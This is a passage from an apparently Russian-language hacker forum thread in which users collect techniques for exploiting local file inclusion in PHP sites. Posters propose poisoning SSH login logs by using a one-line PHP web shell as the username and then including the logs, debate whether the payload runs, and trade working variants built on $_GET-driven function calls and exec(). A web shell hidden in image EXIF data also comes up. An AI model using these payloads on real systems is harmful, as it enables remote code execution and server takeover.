Всмысле мб имеет смысл добавить разжеванный вариант в 1й пост? Некоторые новички может быть в хроме\опере\ие работают и не знают о тампер дате в ФФ Я об этом говорил
А собственно где написано, что она прямо уж для новичков? Это для среднего юзверя, жаждущего познать информацию, у которого прямые клешни и т.п..
Впринципе, можно сделать место функции chr(); как то так: $url=$_GET;$content= file_get_contents($url);...бы увидеть про шелл в exif[/QUOTE]Сделано ;)
Еще можно добавить к варианту |qbz|: 1. Коннект по ssh, 2. Попытки авторизоваться с именем <? $_GET['c']($_GET['a']); ?> 3. Инклуд логов.
Собственно не понял, какое отношение к варианту qbz относится 1 и 2 Но добавлю.... только про 2 метод не понял, зачем нам это нужно, выполнение пхп кода в авторизации, это по-пойму немного бред (сорри) или тут в чём то другом подвох?) З.Ы Постите методы, всё будет включено, соберём самый большой сборник, это будет неплохо, имхо!
ну, логи входов сложно найти, это раз. А во-вторых, вот этот код: Code: <? $_GET['c']($_GET['a']); ?> Вызывает у меня большие подозрения, ведь он вызовет еррор? ладно бы eval() так нет, тут откуда то просто переменная из GET и следом ошибка синтаксиса, мы в итоге получим Fatal error: Function name must be a string, не более, имхо!
Code: # php --version PHP 5.3.2-1ubuntu4.9 with Suhosin-Patch (cli) (built: May 3 2011 00:43:34) Да, и лучше так: Code: <? @$_GET['c']($_GET['a']); ?>
system то робит, а eval как же?) Так можно что то из серии <?exec($_GET['a'],$a);echo$a[0];?> сделать...
